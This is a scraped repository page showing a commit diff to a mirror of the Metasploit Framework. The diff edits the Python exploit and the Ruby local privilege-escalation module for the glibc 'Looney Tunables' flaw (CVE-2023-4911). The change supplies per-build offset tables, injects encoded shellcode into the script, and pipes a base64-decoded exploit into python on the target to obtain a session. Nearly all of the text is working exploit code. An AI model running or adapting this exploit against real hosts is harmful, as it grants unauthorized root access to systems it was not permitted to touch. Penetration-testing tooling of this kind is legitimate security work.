dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Responded to comments from jvoisin

This commit is contained in:
Jack Heysel 2023-12-19 13:50:09 -05:00
parent 96241f509a
commit b86df4820c
2 changed files with 18 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
data/exploits/CVE-2023-4911/cve_2023_4911.py
View File

@ -58,16 +58,7 @@ TARGETS = {
} }
# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py # Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
BUILD_IDS = { BUILD_IDS = METASPLOIT_BUILD_IDS
"69c048078b6c51fa8744f3d7cff3b0d9369ffd53": 561,
"3602eac894717d56555552c84fc6b0e4d6a4af72": 561,
"a99db3715218b641780b04323e4ae5953d68a927": 561,
"a8daca28288575ffc8c7641d40901b0148958fb1": 580,
"61ef896a699bb1c2e4e231642b2e1688b2f1a61e": 560,
"9a9c6aeba5df4178de168e26fe30ddcdab47d374": 580,
"e7b1e0ff3d359623538f4ae0ac69b3e8db26b674": 580,
"956d98a11b839e3392fa1b367b1e3fdfc3e662f6": 322,
}
libc = cdll.LoadLibrary("libc.so.6") libc = cdll.LoadLibrary("libc.so.6")
libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p) libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)

24
modules/exploits/linux/local/glibc_tunables_priv_esc.rb
View File

@ -18,8 +18,15 @@ class MetasploitModule < Msf::Exploit::Local
include Msf::Exploit::FileDropper include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck prepend Msf::Exploit::Remote::AutoCheck
BUILD_IDS = %w[69c048078b6c51fa8744f3d7cff3b0d9369ffd53 3602eac894717d56555552c84fc6b0e4d6a4af72 a99db3715218b641780b04323e4ae5953d68a927 a8daca28288575ffc8c7641d40901b0148958fb1 61ef896a699bb1c2e4e231642b2e1688b2f1a61e 9a9c6aeba5df4178de168e26fe30ddcdab47d374 e7b1e0ff3d359623538f4ae0ac69b3e8db26b674 956d98a11b839e3392fa1b367b1e3fdfc3e662f6] BUILD_IDS = {'69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,
'3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,
'a99db3715218b641780b04323e4ae5953d68a927' => 561,
'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,
'61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,
'9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,
'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,
'956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322
}
def initialize(info = {}) def initialize(info = {})
super( super(
update_info( update_info(
@ -71,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Local
'DisclosureDate' => '2023-10-03', 'DisclosureDate' => '2023-10-03',
'Notes' => { 'Notes' => {
'Stability' => [ CRASH_SAFE, ], 'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ ARTIFACTS_ON_DISK, ], 'SideEffects' => [ ],
'Reliability' => [ REPEATABLE_SESSION, ] 'Reliability' => [ REPEATABLE_SESSION, ]
} }
) )
@ -116,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
def check_ld_so_build_id def check_ld_so_build_id
# Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
if command_exists?('file ') if command_exists?('file')
file_cmd_output = '' file_cmd_output = ''
# This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
@ -128,14 +135,14 @@ class MetasploitModule < Msf::Exploit::Local
(file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')) (file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")'))
end end
when 'debian' when 'debian'
(file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"')) (file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"'))
else else
fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution') fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')
end end
if file_cmd_output =~ /BuildID\[.+\]=(\w+),/ if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
build_id = Regexp.last_match(1) build_id = Regexp.last_match(1)
if BUILD_IDS.include?(build_id) if BUILD_IDS.keys.include?(build_id)
print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.") print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
else else
fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.") fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
@ -160,10 +167,11 @@ class MetasploitModule < Msf::Exploit::Local
# The python script assumes the working directory is the one we can write to. # The python script assumes the working directory is the one we can write to.
cd(datastore['WritableDir']) cd(datastore['WritableDir'])
shell_code = payload.encoded.unpack('H*').first shell_code = payload.encoded.unpack('H*').first
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code)
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code).gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))
# If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully # If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully
output = cmd_exec("$(echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary})") output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")
if output.blank? if output.blank?
print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.') print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')
else else